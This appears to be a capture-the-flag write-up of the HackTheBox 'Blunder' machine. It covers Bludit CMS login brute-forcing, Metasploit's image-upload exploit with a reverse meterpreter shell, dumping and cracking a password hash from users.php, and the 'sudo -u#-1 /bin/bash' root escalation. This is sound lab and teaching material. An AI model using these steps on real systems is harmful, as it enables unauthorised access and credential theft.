Blunder is an easy rated linux machine provided by hackthebox where are mainly represented with some Bludit CMS CVEs. We use an Authentication Bypass through bruteforcing CVE to login on the admin dashboard. Later on we use yet another CVE (Arbitrary File Upload through images) to grab a shell on the machine. A newer version of Bludit is configured in the machine where we find a hash for a system user which we crack later. A sudo misconfiguration easily drops root shell.


As always I start with a nmap scan to grab the initial information :


[email protected]:/home/suljot# nmap -sC -A
Starting Nmap 7.91 ( ) at 2020-10-17 16:28 CEST
Nmap scan report for
Host is up (0.070s latency).
Not shown: 998 filtered ports
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

TRACEROUTE (using port 21/tcp)
1   72.10 ms
2   72.03 ms

Port 21 seems closed so it obviously would be useless for now which leaves port 80 the only vector to gain more information.



Represented with a simple blog webpage which doesnt tell much useful information for the box.

Viewing the source of the webpage reveals things that could be useful :

<!-- Dynamic title tag -->
<title>Blunder | A blunder of interesting facts</title>

<!-- Dynamic description tag -->
<meta name="description" content="HackTheBox">

<!-- Include Favicon -->
<link rel="shortcut icon" href="" type="image/png">

<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="">

<!-- Include CSS Styles from this theme -->
<link rel="stylesheet" type="text/css" href="">

<!-- Load Plugins: Site head -->

<!-- Robots plugin -->

The webpage seems to be running under Bludit CMS and the revealed version seems to be 3.9.2

Upon googling the found information I found an interesting CVE under this version of Bludit :

The above exploit needs at least the username parameter in order to do bruteforcing and yet we dont have any.

Directory Fuzzing

I decided to start fuzzing the webpage for any possible leftovers or interesting files


After some time I find 2 interesting leads :

  • /admin


  • /todo.txt


Initial Foothold

I finally have an username (fergus) provided from the todo leftover and the login page. This way I can take a look on the exploit now.


I firstly created a wordlist using cewl based on the blog provided from the port 80 :

[email protected]:~# cewl -w wordlist.txt
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (
[email protected]:~# ls -la wordlist.txt
-rw-r--r-- 1 root root 2498 Oct 17 16:48 wordlist.txt

I then copied the script in the previous blog localy and changed the parameters to my needs :


Running the exploit I get some correct credentials after a while :



Obviously I can use those creds to login on /admin and access the dashboard :


While searching for a possible vulnerability previously I also found CVE-2019-16113,

Another vulnerability (remote command execution) for the Bludit 3.9.2 version.

I’m going to use metasploit to do that to speed things up, but I recommed doing this one exploit manually as it learned me a few new tricks.

msf5 > use exploit/linux/http/bludit_upload_images_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST tun0

www-data shell

After running the exploit we grab a low-privileged shell to the machine :


Using the shell I just grabbed from the exploit I started to look for possible interesting paths on the machine.

There seems to be a newer version of Bludit (3.10) already installed on the machine but not yet set up on the blog.

Navigating on it I grabbed a very useful hash from users.php

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}

User Escalation

Hugo, the user which the hash corresponds to, appears to be a system user as well.

Using I was able to crack the hash : faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120


With a user shell already , I can easily grab the user flag under home folder.

Upgrading Privileges

I quickly began to do the usual enumeration to find more information on how to grab root access.


[email protected]:~$ sudo -l 
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
[email protected]:~$

From the above information seems like hugo is configured to run sudo commands as anyone except root.

This configuration reminds me of an old sudo CVE where we could use something like : sudo -u#-1 /bin/bash to drop ourselves a root shell.

root shell

I attempted the same exploit on the machine to see if I could get any results :


And with that being the last part of the writeup , We just owned root and can easily grab the root flag!

Leave a comment